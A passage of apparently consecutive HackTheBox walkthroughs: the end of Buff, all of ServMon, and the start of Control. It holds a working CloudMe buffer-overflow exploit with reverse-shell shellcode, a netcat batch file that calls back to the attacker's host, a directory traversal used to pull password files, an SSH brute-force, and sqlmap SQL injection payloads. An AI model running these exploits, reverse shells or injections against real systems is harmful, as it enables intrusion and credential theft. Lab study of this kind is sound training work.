payload += b"\xbb\x2b\x6d\x14\x27\xb9\xea\xe4\x2e\xa2\xa4\xb3"
payload += b"\x67\x14\xbd\x51\x9a\x0f\x17\x47\x67\xc9\x50\xc3"
payload += b"\xbc\x2a\x5e\xca\x31\x16\x44\xdc\x8f\x97\xc0\x88"
payload += b"\x5f\xce\x9e\x66\x26\xb8\x50\xd0\xf0\x17\x3b\xb4"
payload += b"\x85\x5b\xfc\xc2\x89\xb1\x8a\x2a\x3b\x6c\xcb\x55"
payload += b"\xf4\xf8\xdb\x2e\xe8\x98\x24\xe5\xa8\xa9\x6e\xa7"
payload += b"\x99\x21\x37\x32\x98\x2f\xc8\xe9\xdf\x49\x4b\x1b"
payload += b"\xa0\xad\x53\x6e\xa5\xea\xd3\x83\xd7\x63\xb6\xa3"
payload += b"\x44\x83\x93"
Put the payload into the exploit, launch a netcat listener and execute the exploit code.
We can obtain a shell as SYSTEM.
root@kali:~# cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python
payload = b""
payload += b"\xb8\xbd\xb5\xf0\x16\xda\xc8\xd9\x74\x24\xf4\x5a"
payload += b"\x2b\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x57"
payload += b"\x49\x12\xe3\x5b\x5a\x51\x0c\xa3\x9b\x36\x84\x46"
payload += b"\xaa\x76\xf2\x03\x9d\x46\x70\x41\x12\x2c\xd4\x71"
payload += b"\xa1\x40\xf1\x76\x02\xee\x27\xb9\x93\x43\x1b\xd8"
payload += b"\x17\x9e\x48\x3a\x29\x51\x9d\x3b\x6e\x8c\x6c\x69"
payload += b"\x27\xda\xc3\x9d\x4c\x96\xdf\x16\x1e\x36\x58\xcb"
payload += b"\xd7\x39\x49\x5a\x63\x60\x49\x5d\xa0\x18\xc0\x45"
payload += b"\xa5\x25\x9a\xfe\x1d\xd1\x1d\xd6\x6f\x1a\xb1\x17"
payload += b"\x40\xe9\xcb\x50\x67\x12\xbe\xa8\x9b\xaf\xb9\x6f"
payload += b"\xe1\x6b\x4f\x6b\x41\xff\xf7\x57\x73\x2c\x61\x1c"
payload += b"\x7f\x99\xe5\x7a\x9c\x1c\x29\xf1\x98\x95\xcc\xd5"
payload += b"\x28\xed\xea\xf1\x71\xb5\x93\xa0\xdf\x18\xab\xb2"
payload += b"\xbf\xc5\x09\xb9\x52\x11\x20\xe0\x3a\xd6\x09\x1a"
payload += b"\xbb\x70\x19\x69\x89\xdf\xb1\xe5\xa1\xa8\x1f\xf2"
payload += b"\xc6\x82\xd8\x6c\x39\x2d\x19\xa5\xfe\x79\x49\xdd"
payload += b"\xd7\x01\x02\x1d\xd7\xd7\x85\x4d\x77\x88\x65\x3d"
payload += b"\x37\x78\x0e\x57\xb8\xa7\x2e\x58\x12\xc0\xc5\xa3"
payload += b"\xf5\xe5\x13\xa5\x2f\x92\x21\xb9\x3e\x3e\xaf\x5f"
payload += b"\x2a\xae\xf9\xc8\xc3\x57\xa0\x82\x72\x97\x7e\xef"
payload += b"\xb5\x13\x8d\x10\x7b\xd4\xf8\x02\xec\x14\xb7\x78"
payload += b"\xbb\x2b\x6d\x14\x27\xb9\xea\xe4\x2e\xa2\xa4\xb3"
payload += b"\x67\x14\xbd\x51\x9a\x0f\x17\x47\x67\xc9\x50\xc3"
payload += b"\xbc\x2a\x5e\xca\x31\x16\x44\xdc\x8f\x97\xc0\x88"
payload += b"\x5f\xce\x9e\x66\x26\xb8\x50\xd0\xf0\x17\x3b\xb4"
payload += b"\x85\x5b\xfc\xc2\x89\xb1\x8a\x2a\x3b\x6c\xcb\x55"
payload += b"\xf4\xf8\xdb\x2e\xe8\x98\x24\xe5\xa8\xa9\x6e\xa7"
payload += b"\x99\x21\x37\x32\x98\x2f\xc8\xe9\xdf\x49\x4b\x1b"
payload += b"\xa0\xad\x53\x6e\xa5\xea\xd3\x83\xd7\x63\xb6\xa3"
payload += b"\x44\x83\x93"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
Localhost
root@kali:~# nc -nlvp 4444
Listening on 0.0.0.0 4444
Localhost (another window)
root@kali:~# python 48389.py
Localhost (netcat window)
root@kali:~# nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
As always, root.txt is in the directory C:\Users\Administrator\Desktop>.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
c4d1a59966243bf66b7f1fda07f2ead9
13 Dec 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box ServMon.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:/# nmap -p- 10.10.10.184 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-13 09:19 JST
Nmap scan report for 10.10.10.184
Host is up (0.26s latency).
Not shown: 65507 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 11:05AM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3903/tcp filtered charsetmgr
5040/tcp open unknown
5166/tcp filtered winpcs
5635/tcp filtered sfmsso
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
|_ :Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
13864/tcp filtered unknown
14519/tcp filtered unknown
44832/tcp filtered unknown
46769/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
56131/tcp filtered unknown
61003/tcp filtered unknown
61971/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=12/13%Time=5FD56463%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturday\0\0
SF:\0s\0d\0a\0y\0:\0T\0h\0u\0:\0T\0h\0u\0r\0s\0")%r(HTTPOptions,36,"HTTP/1
SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r
SF:(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\
SF:nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nConte
SF:nt-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTT
SF:P/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found"
SF:);
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7m26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-13T00:56:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1771.40 seconds
FTP Enumeration:
root@kali:/# wget -r ftp://anonymous@10.10.10.184
---
root@kali:/# find 10.10.10.184/ -type f
10.10.10.184/Users/Nadine/Confidential.txt
10.10.10.184/Users/Nathan/Notes to do.txt
---
root@kali:/# cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
---
root@kali:/# cat 10.10.10.184/Users/Nadine/Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
SMB Enumeration:
root@kali:/# smbmap -H 10.10.10.184
[!] Authentication error on 10.10.10.184
root@kali:/# smbmap -H 10.10.10.184 -u null
[!] Authentication error on 10.10.10.184
Gobuster Port 80:
root@kali:/# gobuster dir -u http://10.10.10.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.184
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/13 09:56:21 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.184/31065b41-6087-4b6a-aeb3-8be56ccbac20 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
Gobuster Port 8443:
root@kali:/# gobuster dir -u http://10.10.10.184:8443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.184:8443
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/13 10:06:57 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to http://10.10.10.184:8443/: Get http://10.10.10.184:8443/: read tcp 10.10.14.42:44940->10.10.10.184:8443: read: connection reset by peer
2. Getting User
Taking a look at http://10.10.10.184.
We can find a login console for NVMS-1000.
Search vulnerabilities using Searchsploit.
We can find directory traversal vulnerabilities for NVMS 1000.
root@kali:/# searchsploit nvms
-------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Since Metasploit has a module for this vulnerability.
First, try to achieve /windows/win.ini.
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set filepath /windows/win.ini
filepath => /windows/win.ini
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
[+] 10.10.10.184:80 - Downloaded 92 bytes
[+] File saved in: /root/.msf4/loot/20201213101747_default_10.10.10.184_nvms.traversal_963898.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
---
root@kali:/# cat /root/.msf4/loot/20201213101747_default_10.10.10.184_nvms.traversal_963898.txt
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Next, try to get /Users/Nathan/desktop/passwords.txt mentioned in the text file found during FTP enumeration.
We can find a possible passwords list.
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set filepath /users/nathan/desktop/passwords.txt
filepath => /users/nathan/desktop/passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
[+] 10.10.10.184:80 - Downloaded 156 bytes
[+] File saved in: /root/.msf4/loot/20201213102411_default_10.10.10.184_nvms.traversal_836293.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
---
root@kali:/# cat /root/.msf4/loot/20201213102411_default_10.10.10.184_nvms.traversal_836293.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Then, create the following username/password list.
root@kali:/# cat users.txt
nadine
nathan
root@kali:/# cat passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Using the list created, try to bruteforce SSH service.
We can find a credential nadine:L1k3B1gBut7s@W0rk.
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file users.txt
user_file => users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' ''id' is not recognized as an internal or external command, operable program or batch file. '
[*] Command shell session 1 opened (10.10.14.42:35027 -> 10.10.10.184:22) at 2020-12-13 10:29:27 +0900
[-] 10.10.10.184:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now we already have an active session as Nadie (created by Metasploit module).
msf6 auxiliary(scanner/ssh/ssh_login) > sessions 1
[*] Starting interaction with 1...
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>whoami
whoami
servmon\nadine
nadine@SERVMON C:\Users\Nadine>
user.txt is in the directory C:\Users\Nadine\Desktop.
nadine@SERVMON C:\Users\Nadine>type .\desktop\user.txt
type .\desktop\user.txt
db18154361a424fdba2ec9985560b178
3. Getting Root
As always, check what software is installed.
This time, focus on NSClient++ which is not installed by default.
nadine@SERVMON C:\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Program Files
08/04/2020 22:21 <DIR> .
08/04/2020 22:21 <DIR> ..
08/04/2020 22:21 <DIR> Common Files
08/04/2020 22:18 <DIR> Internet Explorer
19/03/2019 04:52 <DIR> ModifiableWindowsApps
16/01/2020 18:11 <DIR> NSClient++
08/04/2020 22:09 <DIR> Reference Assemblies
23/07/2020 12:59 <DIR> UNP
14/01/2020 08:14 <DIR> VMware
08/04/2020 21:31 <DIR> Windows Defender
08/04/2020 21:45 <DIR> Windows Defender Advanced Threat Protection
19/03/2019 04:52 <DIR> Windows Mail
19/03/2019 11:43 <DIR> Windows Multimedia Platform
19/03/2019 05:02 <DIR> Windows NT
19/03/2019 11:43 <DIR> Windows Photo Viewer
19/03/2019 11:43 <DIR> Windows Portable Devices
19/03/2019 04:52 <DIR> Windows Security
19/03/2019 04:52 <DIR> WindowsPowerShell
0 File(s) 0 bytes
18 Dir(s) 27,728,986,112 bytes free
Taking a look at the folder.
We have a config file nsclient.ini.
nadine@SERVMON C:\Program Files>dir .\NSClient++
dir .\NSClient++
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Program Files\NSClient++
16/01/2020 18:11 <DIR> .
16/01/2020 18:11 <DIR> ..
09/12/2015 00:17 28,672 boost_chrono-vc110-mt-1_58.dll
09/12/2015 00:17 50,688 boost_date_time-vc110-mt-1_58.dll
09/12/2015 00:17 117,760 boost_filesystem-vc110-mt-1_58.dll
09/12/2015 00:22 439,296 boost_program_options-vc110-mt-1_58.dll
09/12/2015 00:23 256,000 boost_python-vc110-mt-1_58.dll
09/12/2015 00:17 765,952 boost_regex-vc110-mt-1_58.dll
09/12/2015 00:16 19,456 boost_system-vc110-mt-1_58.dll
09/12/2015 00:18 102,400 boost_thread-vc110-mt-1_58.dll
14/01/2020 13:24 51 boot.ini
18/01/2018 15:51 157,453 changelog.txt
28/01/2018 22:33 1,210,392 check_nrpe.exe
08/04/2020 09:48 <DIR> crash-dumps
05/11/2017 21:09 318,464 Google.ProtocolBuffers.dll
08/12/2015 23:16 1,655,808 libeay32.dll
05/11/2017 22:04 18,351 license.txt
05/10/2017 07:19 203,264 lua.dll
14/01/2020 13:24 <DIR> modules
10/04/2020 18:32 2,683 nsclient.ini
13/12/2020 02:26 30,930 nsclient.log
05/11/2017 21:42 55,808 NSCP.Core.dll
28/01/2018 22:32 4,765,208 nscp.exe
05/11/2017 21:42 483,328 NSCP.Protobuf.dll
19/11/2017 16:18 534,016 nscp_json_pb.dll
19/11/2017 15:55 2,090,496 nscp_lua_pb.dll
23/01/2018 20:57 507,904 nscp_mongoose.dll
19/11/2017 15:49 2,658,304 nscp_protobuf.dll
05/11/2017 22:04 3,921 old-settings.map
28/01/2018 22:21 1,973,760 plugin_api.dll
23/05/2015 08:44 3,017,216 python27.dll
27/09/2015 15:42 28,923,515 python27.zip
28/01/2018 22:34 384,536 reporter.exe
14/01/2020 13:24 <DIR> scripts
14/01/2020 13:24 <DIR> security
08/12/2015 23:16 348,160 ssleay32.dll
23/05/2015 08:44 689,664 unicodedata.pyd
14/01/2020 13:24 <DIR> web
05/11/2017 21:20 1,273,856 where_filter.dll
23/05/2015 08:44 47,616 _socket.pyd
33 File(s) 53,134,928 bytes
7 Dir(s) 27,728,986,112 bytes free
In the config file nsclient.ini, we have tons of information.
What we need to know is the following.
- The password is
ew2x6SsGTxjRwXOT
- Accessible host is
127.0.0.1
nadine@SERVMON C:\Program Files>type .\NSClient++\nsclient.ini
type .\NSClient++\nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
; in flight - TODO
[/settings/NRPE/server]
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
[/modules]
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
Since we already have a password for nadine, try to create a SSH tunnel to access http://127.0.0.1:8443.
root@kali:~# ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password: # L1k3B1gBut7s@W0rk
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
Now we can access to https://10.10.10.184:8443 using web browser.
We already know the password ew2x6SsGTxjRwXOT.
After logged in, we see the following metrics.
Before adding an external script, upload nc64.exe which can be downloaded from here.
We use scp to transfer these files since we already have the credential.
root@kali:~# scp ./nc64.exe nadine@10.10.10.184:C:/temp/nc64.exe
nadine@10.10.10.184's password: # L1k3B1gBut7s@W0rk
nc64.exe 100% 44KB 54.4KB/s 00:00
After that, create the following script to be executed by NSClient.
root@kali:~# cat rshell.bat
@echo off
C:\Temp\nc64.exe 10.10.14.42 4443 -e cmd.exe
Using API, register the previous batch script.
root@kali:~# curl -s -k -u admin -XPUT https://localhost:8443/api/v1/scripts/ext/scripts/rshell.bat --data-binary @rshell.bat
Enter host password for user 'admin':
Added rshell as scripts\rshell.bat
Launch netcat listener on port 4443.
root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
To run the uploaded script manually, execute the following command.
We can run the external script using the API.
root@kali:~# curl -k -u "admin:ew2x6SsGTxjRwXOT" https://127.0.0.1:8443/api/v1/queries/rshell/commands/execute
{"command":"rshell","lines":[{"message":"Command rshell didn't terminate within the timeout period 60s","perf":{}}],"result":3}
Now we have a reverse shell as root.
root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.10.184 53308
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
As always, root.txt is in the directory C:\Users\Administrator\Desktop.
C:\Program Files\NSClient++>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
5d7af017e7cb626125c96ce510ae37c0
30 Aug 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Control.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.167 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 16:08 JST
Nmap scan report for 10.10.10.167
Host is up (0.23s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings:
| LDAPBindReq:
|_ Host '10.10.14.42' is not allowed to connect to this MariaDB server
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=8/22%Time=5F40C5AB%P=x86_64-pc-linux-gnu%r(LD
SF:APBindReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.42'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 363.61 seconds
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.167 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.167
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/22 16:40:35 Starting gobuster
===============================================================
/Images (Status: 301)
/admin.php (Status: 200)
/assets (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/uploads (Status: 301)
===============================================================
2020/08/22 16:42:24 Finished
===============================================================
2. Getting User
On the website at port 80, we have a company website.
In the body of the HTML code, we have some comments that indicates new payment system is under the development.
root@kali:~# curl -s http://10.10.10.167 | head -n 20
<!DOCTYPE html>
<html lang="en">
<head>
<title>Fidelity</title>
<meta charset="utf-8">
<script type="text/javascript" src="assets/js/functions.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<link rel="stylesheet" href="assets/css/main.css" />
<noscript>
<link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload landing">
<div id="page-wrapper">
<!-- To Do:
- Import Products
- Link to new payment system
- Enable SSL (Certificates location \\192.168.4.28\myfiles)
<!-- Header -->
Try to access admin.php we found during web enumeration.
It looks that to access this page, we need…
- A header
- To go through a proxy
Then, add an HTTP header X-Forwarded-For for all traffic.
We can use Burp Suite for this purpose.
The IP address is the one from the HTML comments.
Now we can access the admin console.
Then, try to check if there is any SQL injection.
By posting a single quote, we can find that this search form is suffering SQLi.
Getting additional information using sqlmap.
First, create the following file from Burp Suite.
root@kali:~# cat request.txt
POST /search_products.php HTTP/1.1
Host: 10.10.10.167
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.167
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.167/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
X-Forwarded-For: 192.168.4.28
productName=singlequote
Run the following command.
We can confirm that this DBMS is MySQL and SQL injection here.
root@kali:~# sqlmap -r request.txt
___
__H__
___ ___[(]_____ ___ ___ {1.4.7#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:47:44 /2020-08-22/
[18:47:44] [INFO] parsing HTTP request from 'request.txt'
[18:47:44] [INFO] resuming back-end DBMS 'mysql'
[18:47:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: productName=-4659' OR 1554=1554#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: productName=singlequote' AND (SELECT 6059 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(6059=6059,1))),0x71627a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AQqk
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productName=singlequote';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productName=singlequote' AND (SELECT 9910 FROM (SELECT(SLEEP(5)))MSMm)-- ZxSn
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: productName=singlequote' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x514e62776f6a7857665279767352596548547264775877554474616670484969466b4f724f575572,0x71627a6a71),NULL,NULL,NULL#
---
[18:47:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[18:47:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[*] ending @ 18:47:44 /2020-08-22/
